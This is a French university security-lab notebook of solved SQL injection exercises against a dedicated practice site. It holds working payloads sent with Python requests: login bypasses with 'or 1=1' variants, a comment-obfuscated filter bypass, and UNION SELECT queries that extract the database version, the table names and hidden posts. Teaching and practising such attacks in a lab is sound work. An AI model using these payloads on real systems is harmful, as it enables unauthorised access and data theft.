# ipl I317B Sécurité : labos
## Semaine 2 : Vulnérabilitées web - Injection SQL (1)

### Exercice 1a:
Pour ce premier exercice, nous vous demandons de passer le formulaire de connexion codé par un mauvais développeur :

https://labo.poney.pink/v01/s01/ex1a/

In [4]:
import requests

page = requests.post(
    "https://labo.poney.pink/v01/s01/ex1a/",
    data={
        "login": 'admin" or 1=1;--',
        "password": ""
    }
)

if "Connected !" in page.text:
    print("Exercice réussi")
else:
    print("Ho non :'-(")

Exercice réussi


Pouvez-vous en déduire la syntaxe de la requête SQL présente dans ce formulaire et dans laquelle votre injection fonctionne ?

Une fois injectée devient :

### Exercice 1b:
Une variante du précédant formulaire a été mit en place, connectez-vous à nouveau à celui-ci :

https://labo.poney.pink/v01/s01/ex1b/

In [5]:
import requests

page = requests.post(
    "https://labo.poney.pink/v01/s01/ex1b/",
    data={
        "login": "admin' or 1=1;--",
        "password": ""
    }
)

if "Connected !" in page.text:
    print("Exercice réussi")
else:
    print("Ho non :'-(")

Exercice réussi


Pouvez-vous en déduire la syntaxe de la requête SQL présente dans ce formulaire et dans laquelle votre injection fonctionne ?

Une fois injectée devient :

### Exercice 1c:
Une variante du précédant formulaire a été mit en place, connectez-vous à nouveau à celui-ci :

https://labo.poney.pink/v01/s01/ex1c/

In [6]:
import requests

page = requests.post(
    "https://labo.poney.pink/v01/s01/ex1c/",
    data={
        "login": 'admin" or 1=1);--', #" or 1=1 or"
        "password": ""
    }
)

if "Connected !" in page.text:
    print("Exercice réussi")
else:
    print("Ho non :'-(")

Exercice réussi


Pouvez-vous en déduire la syntaxe de la requête SQL présente dans ce formulaire et dans laquelle votre injection fonctionne ?

Une fois injectée devient :

### Exercice 2:
Dans cette nouvelle version, le développeur semble avoir prit conscience que certains trucs ne devraient pas être accepté ... mais vous êtes plus malin que lui, n'est-ce pas ?

https://labo.poney.pink/v01/s01/ex2/

In [7]:
import requests

page = requests.post(
    "https://labo.poney.pink/v01/s01/ex2/",
    headers = {
        "User-Agent": "Mozilla/5.0 ...",
    },
    data={
        "login": '"/**/or/**/1/**/LIKE/**/1;--',
        "password": ""
    }
)

if "Connected !" in page.text:
    print("Exercice réussi")
else:
    print("Ho non :'-(")

Exercice réussi


### Exercice 3a:
Pour ce nouvel exercice, nous allons utiliser un nouveau formulaire. Ce formulaire nous permet de chercher parmi les éléments du tableau périodique des éléments. Par exemple, si vous cherchez "Co*", vous obtiendrez les informations sur le copper (cuivre) et le cobalt.

https://labo.poney.pink/v01/s01/ex3/

Commencez par récupérer le numéro de version de notre base de donnée. Ici, nous connaissons le type de base de donnée : SQLITE, un petit détour par la documentation nous permet deconnaître la fonction parfait pour cela : https://www.sqlite.org/lang_corefunc.html#sqlite_version.

In [1]:
import requests
from bs4 import BeautifulSoup

page = requests.post(
    "https://labo.poney.pink/v01/s01/ex3/",
    params={
        "name": "' UNION SELECT sqlite_version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--",
    }
)

soup = BeautifulSoup(page.text, "html.parser")
first_td = soup.find("td");

print(first_td)

None


Pouvez-vous en déduire la syntaxe de la requête SQL présente dans ce formulaire et dans laquelle votre injection fonctionne ?

### Exercice 3b:
Dans le même ordre d’idée, je vous invite à récupérer la liste des tables présentes dans cette base de donnée.

Comme souvent, la lecture de la documentation peut vous faciliter la vie : https://www.sqlite.org/faq.html#q7

<sup><sub>(Et comme bien souvent ... la vrai vie c'est compliqué : https://www.sqlite.org/schematab.html#alternative_names )</sub></sup>

In [11]:
import requests
from bs4 import BeautifulSoup

page = requests.post(
    "https://labo.poney.pink/v01/s01/ex3/",
    params={
        "name": "' UNION SELECT name, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM sqlite_schema WHERE type='table' ORDER BY name;--",
    }
)

soup = BeautifulSoup(page.text, "html.parser")
td_elements = soup.findAll("td");

non_empty_tds = [td for td in td_elements if td.get_text()]

print(non_empty_tds)

[<td>elements</td>, <td>gemstones</td>, <td>planets</td>]


### Exercice 4:

Le site suivant permet l'injection de code SQL, pouvez-vous utiliser une de celle-ci pour récupérer le contenu de posts caché dans la base de donnée ? (un champ "hidden" dans la base de données permet d'empêcher certains posts d'être affiché)

https://labo.poney.pink/v01/s01/ex4/

In [27]:
import requests
from bs4 import BeautifulSoup

page = requests.post(
    "https://labo.poney.pink/v01/s01/ex4/",
    params={
        "search": "'AND 1=0 UNION SELECT NULL, post_text, img_url, hidden FROM posts WHERE hidden='1' ORDER BY hidden;--",
    }
)
# ' UNION SELECT NULL, sql, NULL, NULL FROM sqlite_master WHERE type='table' AND name='posts';--



soup = BeautifulSoup(page.text, "html.parser")
td_elements = soup.find("img")

print(td_elements)

<img alt="Wipe all the things" class="card-img-top" src="/static/img/934cbafe-f5e6-4b3f-a884-f1e0ef56c848.png"/>


### Exercice 3c (bonus):
Maintenant que vous connaissez toutes les tables dans la base de données de l'exercice 3, ainsi que le nom de chaque champ, pourquoi ne pas récupérer le contenu de chacune de ces tables ?

In [8]:
#TODO